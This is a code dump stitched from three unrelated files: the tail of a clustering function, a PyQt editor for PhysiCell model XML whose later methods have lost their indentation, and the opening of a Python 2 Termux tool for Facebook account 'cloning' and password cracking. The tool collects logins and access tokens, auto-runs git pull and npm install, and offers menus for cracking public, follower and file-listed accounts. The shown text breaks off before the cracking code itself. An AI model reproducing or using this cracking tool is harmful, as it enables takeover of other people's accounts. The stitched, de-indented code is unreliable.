            similarities[key_i].put(
                key_j, segment_i.sim(segment_j, similarity=similarity)
            )
    # Search for the best items to agglomerate/merge
    # best is a (1/similarity, key, similarity) entry, so best[2] is the
    # similarity value compared against the threshold.
    best, orig = get_merge_candidates(similarities)
    while best and (best[2] > threshold):
        to_merge = {orig, best[1]}
        logger.debug(f" Merging (clusters) -> {to_merge}")
        merged = SegmentCluster(orig + best[1], data)  # Merged cluster
        # compute() caches the merged segment (and intermediates) in data_dict.
        merged_segment = merged.compute(cache=data_dict, update=True)
        # Similar candidates to the cluster to update their similarity entries (previous similar to the (orig and best))
        to_update = set(
            chain(
                *[
                    container.similar
                    for container in filter(
                        lambda item: item is not None,
                        [similarities.get(key, None) for key in to_merge],
                    )
                ]
            )
        )
        # remove the merged part
        for key in to_merge:
            if key in similarities:
                del similarities[key]
        # remove the merged item from the other similarity container
        for key, sim_container in similarities.items():
            sim_container.remove(orig)
            sim_container.remove(best[1])
        to_update.difference_update(
            {orig, best[1]}
        )  # clean to_update from the already merged items
        to_update.update(similarities.keys())
        # Register the new cluster and (re)compute its similarity to every
        # remaining candidate.
        similarities[merged._id] = SimContainer(merged_segment)
        for key in to_update:
            similarities[merged._id].put(
                key, merged_segment.sim(data_dict[key], similarity=similarity)
            )
        # get the next best candidates to agglomerate
        best, orig = get_merge_candidates(similarities)
    return similarities, data_dict
| StarcoderdataPython |
3540433 | """
Authors:
<NAME> (<EMAIL>)
<NAME>, <NAME>, <NAME>, <NAME>
Dr. <NAME> (<EMAIL>)
--- Versions ---
0.1 - initial version
"""
# https://doc.qt.io/qtforpython/gettingstarted.html
import os
import sys
import getopt
import shutil
from pathlib import Path
import xml.etree.ElementTree as ET # https://docs.python.org/2/library/xml.etree.elementtree.html
from xml.dom import minidom
from PyQt5 import QtCore, QtGui
from PyQt5.QtWidgets import *
from config_tab import Config
from cell_def_tab import CellDef
from cell_custom_data_tab import CellCustomData
from microenv_tab import SubstrateDef
from user_params_tab import UserParams
# from sbml_tab import SBMLParams
from vis_tab import Vis
def SingleBrowse(self):
    """Open a file-chooser dialog filtered to *.xml.

    NOTE(review): the selected path is currently discarded — nothing is
    returned or stored — so this helper has no observable effect yet.
    """
    # if len(self.csv) < 2:
    filePath = QFileDialog.getOpenFileName(self,'',".",'*.xml')
    # if filePath != "" and not filePath in self.csv:
    #     self.csv.append(filePath)
    # print(self.csv)
#class PhysiCellXMLCreator(QTabWidget):
class PhysiCellXMLCreator(QWidget):
# def __init__(self, parent = None):
    def __init__(self, show_vis_flag, parent = None):
        """Build the main window: copy/load the default sample model
        ("template"), create all editor tabs, and assemble the tab widget.

        :param show_vis_flag: when True, add the "Plot" (Vis) tab and select it.
        :param parent: optional Qt parent widget.
        """
        super(PhysiCellXMLCreator, self).__init__(parent)
        self.title_prefix = "PhysiCell Model Creator: "
        self.setWindowTitle(self.title_prefix)
        # Menus
        vlayout = QVBoxLayout(self)
        # vlayout.setContentsMargins(5, 35, 5, 5)
        # NOTE(review): menu() has no return statement, so this is
        # QWidget(None) — confirm whether the menu bar is meant to be parented
        # into the layout here.
        menuWidget = QWidget(self.menu())
        vlayout.addWidget(menuWidget)
        # self.setWindowIcon(self.style().standardIcon(getattr(QStyle, 'SP_DialogNoButton')))
        # self.setWindowIcon(QtGui.QIcon('physicell_logo_25pct.png'))
        # self.grid = QGridLayout()
        # lay.addLayout(self.grid)
        self.setLayout(vlayout)
        # self.setMinimumSize(400, 790)  # width, height (height >= Cell Types|Death params)
        # self.setMinimumSize(400, 500)  # width, height (height >= Cell Types|Death params)
        # self.setMinimumSize(800, 620)  # width, height (height >= Cell Types|Death params)
        # self.setMinimumSize(800, 660)  # width, height (height >= Cell Types|Death params)
        # self.setMinimumSize(800, 800)  # width, height (height >= Cell Types|Death params)
        self.setMinimumSize(700, 770)  # width, height (height >= Cell Types|Death params)
        # self.setMinimumSize(600, 600)  # width, height (height >= Cell Types|Death params)
        # self.resize(400, 790)  # width, height (height >= Cell Types|Death params)
        # self.menubar = QtWidgets.QMenuBar(self)
        # self.file_menu = QtWidgets.QMenu('File')
        # self.file_menu.insertAction("Open")
        # self.menubar.addMenu(self.file_menu)
        # GUI tabs
        # By default, let's startup the app with a default of template2D (a copy)
        # self.new_model_cb() # default on startup
        # read_file = "../data/subcellular_flat.xml"
        # read_file = "../data/cancer_biorobots_flat.xml"
        # read_file = "../data/pred_prey_flat.xml"
        # Sequential developer overrides: only the LAST assignment ("template")
        # takes effect as the startup model.
        model_name = "pred_prey_flat"
        model_name = "biorobots_flat"
        model_name = "cancer_biorobots_flat"
        model_name = "test1"
        model_name = "test-gui"
        model_name = "covid19_v5_flat"
        model_name = "template"
        # model_name = "randy_test" #rwh
        # read_file = "data/" + model_name + ".xml"
        # then what??
        # binDirectory = os.path.realpath(os.path.abspath(__file__))
        # Resolve the sample .xml relative to this script's directory (../data).
        binDirectory = os.path.dirname(os.path.abspath(__file__))
        dataDirectory = os.path.join(binDirectory,'..','data')
        # read_file = model_name + ".xml"
        read_file = os.path.join(dataDirectory, model_name + ".xml")
        # self.setWindowTitle(self.title_prefix + model_name)
        # NOTE! We create a *copy* of the .xml sample model and will save to it.
        copy_file = "copy_" + model_name + ".xml"
        shutil.copy(read_file, copy_file)
        self.setWindowTitle(self.title_prefix + copy_file)
        # self.add_new_model(copy_file, True)
        # self.config_file = "config_samples/" + name + ".xml"
        self.config_file = copy_file  # to Save
        # self.config_file = read_file # nanoHUB... to Save
        self.tree = ET.parse(self.config_file)
        # tree = ET.parse(read_file)
        # self.tree = ET.parse(read_file)
        self.xml_root = self.tree.getroot()
        # self.template_cb()
        self.num_models = 0
        self.model = {}  # key: name, value:[read-only, tree]
        # --- Create each editor tab and point it at the parsed XML root. ---
        self.config_tab = Config()
        self.config_tab.xml_root = self.xml_root
        self.config_tab.fill_gui()
        self.microenv_tab = SubstrateDef()
        self.microenv_tab.xml_root = self.xml_root
        substrate_name = self.microenv_tab.first_substrate_name()
        print("gui4xml: substrate_name=",substrate_name)
        self.microenv_tab.populate_tree()  # rwh: both fill_gui and populate_tree??
        # self.tab2.tree.setCurrentItem(QTreeWidgetItem,0) # item
        self.celldef_tab = CellDef()
        self.celldef_tab.xml_root = self.xml_root
        cd_name = self.celldef_tab.first_cell_def_name()
        print("gui4xml: cd_name=",cd_name)
        self.celldef_tab.populate_tree()
        self.celldef_tab.fill_substrates_comboboxes()
        self.microenv_tab.celldef_tab = self.celldef_tab
        self.cell_customdata_tab = CellCustomData()
        self.cell_customdata_tab.xml_root = self.xml_root
        self.cell_customdata_tab.celldef_tab = self.celldef_tab
        self.cell_customdata_tab.fill_gui(self.celldef_tab)
        self.celldef_tab.fill_custom_data_tab()
        self.user_params_tab = UserParams()
        self.user_params_tab.xml_root = self.xml_root
        self.user_params_tab.fill_gui()
        # self.sbml_tab = SBMLParams()
        # self.sbml_tab.xml_root = self.xml_root
        # self.sbml_tab.fill_gui()
        #------------------
        tabWidget = QTabWidget()
        tabWidget.addTab(self.config_tab,"Config Basics")
        tabWidget.addTab(self.microenv_tab,"Microenvironment")
        tabWidget.addTab(self.celldef_tab,"Cell Types")
        tabWidget.addTab(self.cell_customdata_tab,"Cell Custom Data")
        tabWidget.addTab(self.user_params_tab,"User Params")
        if show_vis_flag:
            self.vis_tab = Vis()
            # self.vis_tab.xml_root = self.xml_root
            tabWidget.addTab(self.vis_tab,"Plot")
        vlayout.addWidget(tabWidget)
        # self.addTab(self.sbml_tab,"SBML")
        # tabWidget.setCurrentIndex(1) # rwh/debug: select Microenv
        # tabWidget.setCurrentIndex(2) # rwh/debug: select Cell Types
        if show_vis_flag:
            tabWidget.setCurrentIndex(5)  # Vis (default)
        else:
            tabWidget.setCurrentIndex(0)  # Config (default)
    def menu(self):
        """Build the menu bar: File (New/Open/Save + a Samples submenu with one
        action per bundled sample model) and Tools (Validate).

        NOTE(review): this method returns None implicitly although __init__
        passes its result to QWidget(...) — confirm intent.
        """
        menubar = QMenuBar(self)
        menubar.setNativeMenuBar(False)
        #--------------
        file_menu = menubar.addMenu('&File')
        # open_act = QtGui.QAction('Open', self, checkable=True)
        # open_act = QtGui.QAction('Open', self)
        # open_act.triggered.connect(self.open_as_cb)
        file_menu.addAction("New (template)", self.new_model_cb, QtGui.QKeySequence('Ctrl+n'))
        file_menu.addAction("Open", self.open_as_cb, QtGui.QKeySequence('Ctrl+o'))
        file_menu.addAction("Save", self.save_cb, QtGui.QKeySequence('Ctrl+s'))
        # file_menu.addAction("Save as", self.save_as_cb)
        file_menu.addAction("Save as mymodel.xml", self.save_as_cb)
        # recent_act = QtGui.QAction('Recent', self)
        # save_act = QtGui.QAction('Save', self)
        # save_act.triggered.connect(self.save_cb)
        # saveas_act = QtGui.QAction('Save As my.xml', self)
        # file_menu.setStatusTip('enable/disable Dark mode')
        # new_model_act = QtGui.QAction('', self)
        # file_menu.addAction(new_model_act)
        # new_model_act.triggered.connect(self.new_model_cb)
        #--------------
        # One entry per sample model; each callback copies the sample and loads
        # the copy so the original data file is never modified.
        samples_menu = file_menu.addMenu("Samples (copy of)")
        # biorobots_act = QtGui.QAction('biorobots', self)
        biorobots_act = QAction('biorobots', self)
        samples_menu.addAction(biorobots_act)
        biorobots_act.triggered.connect(self.biorobots_cb)
        cancer_biorobots_act = QAction('cancer biorobots', self)
        samples_menu.addAction(cancer_biorobots_act)
        cancer_biorobots_act.triggered.connect(self.cancer_biorobots_cb)
        hetero_act = QAction('heterogeneity', self)
        samples_menu.addAction(hetero_act)
        hetero_act.triggered.connect(self.hetero_cb)
        pred_prey_act = QAction('predator-prey-farmer', self)
        samples_menu.addAction(pred_prey_act)
        pred_prey_act.triggered.connect(self.pred_prey_cb)
        virus_mac_act = QAction('virus-macrophage', self)
        samples_menu.addAction(virus_mac_act)
        virus_mac_act.triggered.connect(self.virus_mac_cb)
        worm_act = QAction('worm', self)
        samples_menu.addAction(worm_act)
        worm_act.triggered.connect(self.worm_cb)
        cancer_immune_act = QAction('cancer immune (3D)', self)
        samples_menu.addAction(cancer_immune_act)
        cancer_immune_act.triggered.connect(self.cancer_immune_cb)
        template_act = QAction('template', self)
        samples_menu.addAction(template_act)
        template_act.triggered.connect(self.template_cb)
        subcell_act = QAction('subcellular', self)
        samples_menu.addAction(subcell_act)
        subcell_act.triggered.connect(self.subcell_cb)
        covid19_act = QAction('covid19_v5', self)
        samples_menu.addAction(covid19_act)
        covid19_act.triggered.connect(self.covid19_cb)
        test_gui_act = QAction('test-gui', self)
        samples_menu.addAction(test_gui_act)
        test_gui_act.triggered.connect(self.test_gui_cb)
        #--------------
        # file_menu.addAction(open_act)
        # file_menu.addAction(recent_act)
        # file_menu.addAction(save_act)
        # file_menu.addAction(save_act, self.save_act, QtGui.QKeySequence("Ctrl+s"))
        # file_menu.addAction(saveas_act)
        #--------------
        # self.models_menu = menubar.addMenu('&Models')
        # models_menu_act = QAction('-----', self)
        # self.models_menu.addAction(models_menu_act)
        # models_menu_act.triggered.connect(self.select_current_model_cb)
        # # self.models_menu.addAction('Load sample', self.select_current_model_cb)
        #--------------
        tools_menu = menubar.addMenu('&Tools')
        validate_act = QAction('Validate', self)
        tools_menu.addAction(validate_act)
        validate_act.triggered.connect(self.validate_cb)
        menubar.adjustSize()  # Argh. Otherwise, only 1st menu appears, with ">>" to others!
#-----------------------------------------------------------------
    def add_new_model(self, name, read_only):
        """Register a model by name (no-op if already registered) and reflect
        it in the window title.

        :param name: model file name used as the registry key.
        :param read_only: stored as the registry value (read-only flag).
        """
        # does it already exist? If so, return
        if name in self.model.keys():
            return
        self.model[name] = read_only
        self.num_models += 1
        print("add_new_model: self.model (dict)= ",self.model)
        # models_menu_act = QAction(name, self)
        # self.models_menu.addAction(models_menu_act)
        # models_menu_act.triggered.connect(self.select_current_model_cb)
        print("add_new_model: title suffix= ",name)
        self.setWindowTitle(self.title_prefix + name)
    # Probably not used unless we later implement it
    # def select_current_model_cb(self):
    #     # models_menu_act = QtGui.QAction(name, self)
    #     # self.models_menu.addAction(models_menu_act)
    #     model_act = self.models_menu.menuAction()
    #     print('select_current_model_cb: ',model_act)
    #     action = self.sender()
    #     model_name = action.text()
    #     print('select_current_model_cb: title suffix name= ',model_name)
    #     self.setWindowTitle(self.title_prefix + model_name)
    def reset_xml_root(self):
        """Re-point every tab at the freshly parsed XML tree (self.tree) and
        rebuild each tab's GUI. The call order is significant: custom-data must
        be (re)filled before the cell-definitions tab is populated.
        """
        # Clear cell-def state left over from the previous model.
        self.celldef_tab.clear_custom_data_tab()
        self.celldef_tab.param_d.clear()  # seems unnecessary as being done in populate_tree. argh.
        self.celldef_tab.current_cell_def = None
        # self.microenv_tab.param_d.clear()
        self.xml_root = self.tree.getroot()
        self.config_tab.xml_root = self.xml_root
        self.microenv_tab.xml_root = self.xml_root
        self.celldef_tab.xml_root = self.xml_root
        self.cell_customdata_tab.xml_root = self.xml_root
        self.user_params_tab.xml_root = self.xml_root
        self.config_tab.fill_gui()
        self.microenv_tab.clear_gui()
        self.microenv_tab.populate_tree()
        # self.microenv_tab.fill_gui(None)
        # self.microenv_tab.fill_gui()
        # Do this before the celldef_tab
        self.cell_customdata_tab.clear_gui(self.celldef_tab)
        self.cell_customdata_tab.fill_gui(self.celldef_tab)
        # self.celldef_tab.clear_gui()
        self.celldef_tab.clear_custom_data_params()
        self.celldef_tab.populate_tree()
        # self.celldef_tab.fill_gui(None)
        # self.celldef_tab.customize_cycle_choices() #rwh/todo: needed?
        self.celldef_tab.fill_substrates_comboboxes()
        self.microenv_tab.celldef_tab = self.celldef_tab
        # self.cell_customdata_tab.clear_gui(self.celldef_tab)
        # self.cell_customdata_tab.fill_gui(self.celldef_tab)
        self.user_params_tab.clear_gui()
        self.user_params_tab.fill_gui()
    def show_sample_model(self):
        """Parse self.config_file, refresh every tab from the new tree, and
        update the window title with the file name."""
        print("show_sample_model: self.config_file = ", self.config_file)
        # self.config_file = "config_samples/biorobots.xml"
        self.tree = ET.parse(self.config_file)
        # self.xml_root = self.tree.getroot()
        self.reset_xml_root()
        self.setWindowTitle(self.title_prefix + self.config_file)
        # self.config_tab.fill_gui(self.xml_root) #
        # self.microenv_tab.fill_gui(self.xml_root) # microenv
        # self.celldef_tab.fill_gui("foobar") # cell defs
        # self.celldef_tab.fill_motility_substrates()
def open_as_cb(self):
# filePath = QFileDialog.getOpenFileName(self,'',".",'*.xml')
filePath = QFileDialog.getOpenFileName(self,'',".")
print("\n\nopen_as_cb(): filePath=",filePath)
full_path_model_name = filePath[0]
# sample_file = Path("data", name + ".xml")
# copy_file = "copy_" + name + ".xml"
copy_file = "mymodel.xml"
# shutil.copy(sample_file, copy_file)
shutil.copy(full_path_model_name, copy_file)
self.add_new_model(copy_file, True)
# self.config_file = "config_samples/" + name + ".xml"
self.config_file = copy_file
self.show_sample_model()
def indent(elem, level=0):
i = "\n" + level*" "
if len(elem):
if not elem.text or not elem.text.strip():
elem.text = i + " "
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
indent(elem, level+1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
def prettify(self, elem):
"""Return a pretty-printed XML string for the Element.
"""
rough_string = ET.tostring(elem, 'utf-8')
reparsed = minidom.parseString(rough_string)
return reparsed.toprettyxml(indent="", newl="") # newl="\n"
    def save_cb(self):
        """Flush the Config tab into the XML tree and write it to
        self.config_file.

        NOTE(review): unlike save_as_cb, only config_tab.fill_xml() runs here —
        the microenv/celldef/user_params flushes are commented out, so edits in
        those tabs are NOT written by plain Save. Confirm this is deliberate.
        """
        # self.config_file = copy_file
        self.config_tab.fill_xml()
        # self.microenv_tab.fill_xml()
        # self.celldef_tab.fill_xml()
        # self.user_params_tab.fill_xml()
        # filePath = QFileDialog.getOpenFileName(self,'',".",'*.xml')
        # print("gui4xml: save_cb: writing to: ",self.config_file)
        out_file = self.config_file
        # out_file = "mymodel.xml"
        print("gui4xml: save_cb: writing to: ",out_file)
        # self.tree.write(self.config_file)
        # root = ET.fromstring("<fruits><fruit>banana</fruit><fruit>apple</fruit></fruits>""")
        # tree = ET.ElementTree(root)
        # ET.indent(self.tree) # ugh, only in 3.9
        # root = ET.tostring(self.tree)
        # self.indent(self.tree)
        # self.indent(root)
        # rwh: ARGH, doesn't work
        # root = self.tree.getroot()
        # out_str = self.prettify(root)
        # print(out_str)
        self.tree.write(out_file)
        # rwh NOTE: after saving the .xml, do we need to read it back in to reflect changes.
        # self.tree = ET.parse(self.config_file)
        # self.xml_root = self.tree.getroot()
        # self.reset_xml_root()
def validate_cb(self):
msgBox = QMessageBox()
msgBox.setIcon(QMessageBox.Information)
msgBox.setText("Validation not yet implemented.")
msgBox.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)
returnValue = msgBox.exec()
if returnValue == QMessageBox.Ok:
print('OK clicked')
def save_as_cb(self):
# save_as_file = QFileDialog.getSaveFileName(self,'',".")
# if save_as_file:
# print(save_as_file)
# print(" save_as_file: ",save_as_file) # writing to: ('/Users/heiland/git/PhysiCell-model-builder/rwh.xml', 'All Files (*)')
self.config_tab.fill_xml()
self.microenv_tab.fill_xml()
self.celldef_tab.fill_xml()
self.user_params_tab.fill_xml()
save_as_file = "mymodel.xml"
print("gui4xml: save_as_cb: writing to: ",save_as_file) # writing to: ('/Users/heiland/git/PhysiCell-model-builder/rwh.xml', 'All Files (*)')
self.tree.write(save_as_file)
def new_model_cb(self):
# name = "copy_template"
# self.add_new_model(name, False)
# self.config_file = "config_samples/template.xml"
# self.show_sample_model()
name = "template"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
# self.config_file = "config_samples/" + name + ".xml"
self.config_file = copy_file
self.show_sample_model()
def biorobots_cb(self):
print("\n\n\n================ copy/load sample ======================================")
name = "biorobots_flat"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
# self.config_file = "config_samples/" + name + ".xml"
self.config_file = copy_file
self.show_sample_model()
# self.tree = ET.parse(self.config_file)
# self.xml_root = self.tree.getroot()
# self.celldef_tab.xml_root = self.xml_root
# self.config_tab.fill_gui(self.xml_root)
# self.microenv_tab.fill_gui(self.xml_root)
# self.celldef_tab.fill_gui(self.xml_root)
def cancer_biorobots_cb(self):
name = "cancer_biorobots_flat"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
self.config_file = copy_file
self.show_sample_model()
def hetero_cb(self):
name = "heterogeneity"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
self.config_file = copy_file
self.show_sample_model()
def pred_prey_cb(self):
name = "pred_prey_flat"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
self.config_file = copy_file
self.show_sample_model()
def virus_mac_cb(self):
name = "virus_macrophage_flat"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
self.config_file = copy_file
self.show_sample_model()
def worm_cb(self):
name = "worm"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
self.config_file = copy_file
self.show_sample_model()
def cancer_immune_cb(self):
name = "cancer_immune3D_flat"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
self.config_file = copy_file
self.show_sample_model()
def template_cb(self):
name = "template"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
self.config_file = copy_file
self.show_sample_model()
# def template3D_cb(self):
# name = "template3D_flat"
# self.add_new_model(name, True)
# self.config_file = "config_samples/" + name + ".xml"
# self.show_sample_model()
def subcell_cb(self):
name = "subcellular_flat"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
self.config_file = copy_file
self.show_sample_model()
def covid19_cb(self):
name = "covid19_v5_flat"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
self.config_file = copy_file
self.show_sample_model()
def test_gui_cb(self):
name = "test-gui"
sample_file = Path("data", name + ".xml")
copy_file = "copy_" + name + ".xml"
shutil.copy(sample_file, copy_file)
self.add_new_model(copy_file, True)
self.config_file = copy_file
self.show_sample_model()
# def main():
# app = QApplication(sys.argv)
# ex = PhysiCellXMLCreator()
# # ex.setGeometry(100,100, 800,600)
# ex.show()
# sys.exit(app.exec_())
def main():
    """Parse command-line options and launch the model-builder GUI.

    Options:
        -h          print usage and exit
        -v, --vis   enable the visualization ("Plot") tab

    BUGFIX: the option string was "hv:" (making -v wrongly require an
    argument), and the flag test used ``opt in ("--vis")`` — parentheses
    around a single string are not a tuple, so that was a substring test
    against "--vis" rather than membership. Also removed the unused
    ``inputfile`` variable.
    """
    show_vis_tab = False
    try:
        opts, args = getopt.getopt(sys.argv[1:], "hv", ["vis"])
    except getopt.GetoptError:
        print('getopt exception')
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            print('bin/gui4xml.py [--vis]')
            sys.exit(1)
        elif opt in ('-v', '--vis'):
            show_vis_tab = True
    app = QApplication(sys.argv)
    ex = PhysiCellXMLCreator(show_vis_tab)
    # ex.setGeometry(100,100, 800,600)
    ex.show()
    sys.exit(app.exec_())
if __name__ == '__main__':
    main()
6598784 | <reponame>fiazkhan420/khan
#!/usr/bin/python2
# coding=utf-8
import os
import sys
import time
import datetime
import re
import threading
import json
import random
import requests
import hashlib
import cookielib
import uuid
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
__author__ = 'Mr-Robot'
__copyright = 'All rights reserved . Copyright Mr-Robot'
os.system('termux-setup-storage')
try:
os.mkdir('/sdcard/ids')
except OSError:
pass
bd = random.randint(2e+07, 3e+07)
sim = random.randint(20000, 40000)
header = {
'x-fb-connection-bandwidth': repr(bd),
'x-fb-sim-hni': repr(sim),
'x-fb-net-hni': repr(sim),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]',
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
os.system('git pull')
os.system('clear')
#### colours ####
B='\033[1;94m'
R='\033[1;91m'
G='\033[1;92m'
W='\033[1;97m'
S='\033[1;96m'
P='\033[1;95m'
Y='\033[1;93m'
#Dev:<NAME>
#### LOGO ####
logo = """
\033[1;97m ****************"*****************
\033[1;96m *███╗░░░███╗██████╗░░██████╗░ *F*
\033[1;95m *████╗░████║██╔══██╗██╔════╝░ *A*
\033[1;94m *██╔████╔██║██████╔╝██║░░██╗░ *M*
\033[1;93m *██║╚██╔╝██║██╔═══╝░██║░░╚██╗ *I*
\033[1;92m *██║░╚═╝░██║██║░░░░░╚██████╔╝ *L*
\033[1;91m *╚═╝░░░░░╚═╝╚═╝░░░░░░╚═════╝░ *Y*
\033[1;92m 🄱🅁🄰🄽🄳
\033[1;97m **********************************
\033[1;93m SCRIPT MAKER : XTY<NAME>
\033[1;96m GANG OWNER : <NAME>
\033[1;95m NOTE : ONLY FOR GANG
\033[1;94m BE ORIGINAL LETS THE WORLD COPY U
\033[1;97m *********************************
"""
def reg():
os.system('clear')
print logo
print ''
print '\033[1;31;1mTake The Free Approval For Login'
print ''
time.sleep(1)
try:
to = open('/sdcard/.hst.txt', 'r').read()
except (KeyError, IOError):
reg2()
r = requests.get('https://raw.githubusercontent.com/pathani404/MPG/main/mpg.txt').text
if to in r:
os.system('cd ..... && npm install')
os.system('fuser -k 5000/tcp &')
os.system('#')
os.system('cd ..... && node index.js &')
time.sleep(2)
ip()
else:
os.system('clear')
print logo
print '\tApproved Failed'
print ' \033[1;92mYour Id Is Not Approved Already '
print ' \033[1;92mCopy the id and send to admin'
print ' \033[1;92mYour id: ' + to
raw_input('\033[1;93m Press enter to send id')
os.system('xdg-open https://wa.me/+923414547149')
reg()
def reg2():
os.system('clear')
print logo
print '\tApproval not detected'
print ' \033[1;92mCopy kr k send kro Whatsapp py to continue'
id = uuid.uuid4().hex[:50]
print ' Your id: ' + id
print ''
raw_input(' Press enter to go to Whatsapp ')
os.system('xdg-open https://wa.me/+923414547149')
sav = open('/sdcard/.hst.txt', 'w')
sav.write(id)
sav.close()
raw_input('\033[1;92m Press enter to check Approval ')
reg()
def ip():
os.system('clear')
print logo
print '\tCollecting device info'
try:
ipinfo = requests.get('http://ip-api.com/json/')
z = json.loads(ipinfo.text)
ips = z['query']
country = z['country']
regi = z['regionName']
network = z['isp']
except:
pass
print '\033[1;92m Your ip: ' + ips
time.sleep(2)
print '\033[1;92m Your country: ' + country
time.sleep(2)
print '\033[1;92m Your region: ' + regi
time.sleep(2)
print ' \033[1;92mYour network: ' + network
time.sleep(2)
print ' Loading ...'
time.sleep(2)
log_menu()
def log_menu():
try:
t_check = open('access_token.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print '\033[1;90m *********Login menu*********\033[1;94m'
print 47 * '-'
print '\033[1;92m[1] Login with FaceBook'
print '\033[1;92m[2] Login with token'
print '\033[1;92m[3] MPG Brand'
print ''
log_menu_s()
def log_menu_s():
s = raw_input(' \033[1;97m╰─MPG➤ ')
if s == '1':
log_fb()
elif s == '2':
log_token()
elif s == '3':
os.system('xdg-open https://facebook.com/quyyam.jafar/')
else:
print ''
print '\\ Select valid option '
print ''
log_menu_s()
def log_fb():
os.system('clear')
print logo
print '\033[1;31;1mLogin with id/pass'
print 47 * '-'
lid = raw_input('\033[1;92m Id/mail/no: ')
pwds = raw_input(' \033[1;93mPassword: ')
try:
data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + <PASSWORD>).text
q = json.loads(data)
if 'loc' in q:
ts = open('access_token.txt', 'w')
ts.write(q['loc'])
ts.close()
menu()
elif 'www.facebook.com' in q['error']:
print ' User must verify account before login'
raw_input('\033[1;92m Press enter to try again ')
log_fb()
else:
print ' Id/Pass may be wrong'
raw_input(' \033[1;92mPress enter to try again ')
log_fb()
except:
print ''
print 'Exiting tool'
os.system('exit')
def log_token():
os.system('clear')
print logo
print '\033[1;93mLogin with token\033[1;91m'
print 47 * '-'
tok = raw_input(' \033[1;92mPaste token here: \033[1;91m')
print 47 * '-'
t_s = open('access_token.txt', 'w')
t_s.write(tok)
t_s.close()
menu()
def menu():
os.system('clear')
try:
token = open('access_token.txt', 'r').read()
except (KeyError, IOError):
print ''
print logo
print '\033[1;31;1mLogin FB id to continue'
time.sleep(1)
log_menu()
try:
r = requests.get('https://graph.facebook.com/me?access_token=' + token)
q = json.loads(r.text)
z = q['name']
except (KeyError, IOError):
print logo
print ''
print '\t Account Cheekpoint\x1b[0;97m'
print ''
os.system('rm -rf access_token.txt')
time.sleep(1)
log_menu()
except requests.exceptions.ConnectionError:
print logo
print ''
print '\t Turn on mobile data/wifi\x1b[0;97m'
print ''
raw_input(' \033[1;92mPress enter after turning on mobile data/wifi ')
menu()
os.system('clear')
print logo
tok = open('/sdcard/.hst.txt', 'r').read()
print ' \033[1;92mLogged in user: \033[1;94m' + z
print 47 * '-'
print ' \033[1;90m Active token: \033[1;94m' + tok
print ' ------------------------------------------ '
print '\033[1;92m[1] Start Cloning'
print '\033[1;92m[2] Follow MPG OWNER'
print '\033[1;92m[3] View token'
print '\033[1;92m[4] Logout'
print '\033[1;92m[5] Delete trash files'
menu_s()
def menu_s():
ms = raw_input('\033[1;97m╰─MPG➤ ')
if ms == '1':
auto_crack()
elif ms == '2':
os.system('xdg-open https://facebook.com/quyyam.jafar/')
elif ms == '3':
v_tok()
elif ms == '4':
lout()
elif ms == '5':
rtrash()
else:
print ''
print '\tSelect valid option'
print ''
menu_s()
def crack():
global toket
try:
toket=open('login.txt','r').read()
except (KeyError, IOError):
os.system('clear')
print logo
print '\t File Not Found \x1b[0;97m'
print ''
time.sleep(1)
log_menu()
os.system('clear')
print logo
print '\033[1;90m~~~~ Choice pass cracking ~~~~\033[1;94m'
print 47 * '-'
print '\033[1;92m[1] Public id cloning'
print '\033[1;92m[2] Followers cloning'
print '\033[1;92m[3] File cloning'
print '\033[1;92m[0] Back'
a_s()
def auto_crack():
global token
try:
token = open('access_token.txt', 'r').read()
except (KeyError, IOError):
os.system('clear')
print logo
print '\t Login FB id to continue\x1b[0;97m'
print ''
time.sleep(1)
log_menu()
os.system('clear')
print logo
print '\033[1;90m~~~~ Choice pass cracking ~~~~\033[1;94m'
print 47 * '-'
print '\033[1;92m[1] Public id cloning'
print '\033[1;92m[2] Followers cloning'
print '\033[1;92m[3] File cloning'
print '\033[1;92m[0] Back'
a_s()
def a_s():
id = []
cps = []
oks = []
a_s = raw_input(' \033[1;97m╰─MPG➤ ')
if a_s == '1':
os.system('clear')
print logo
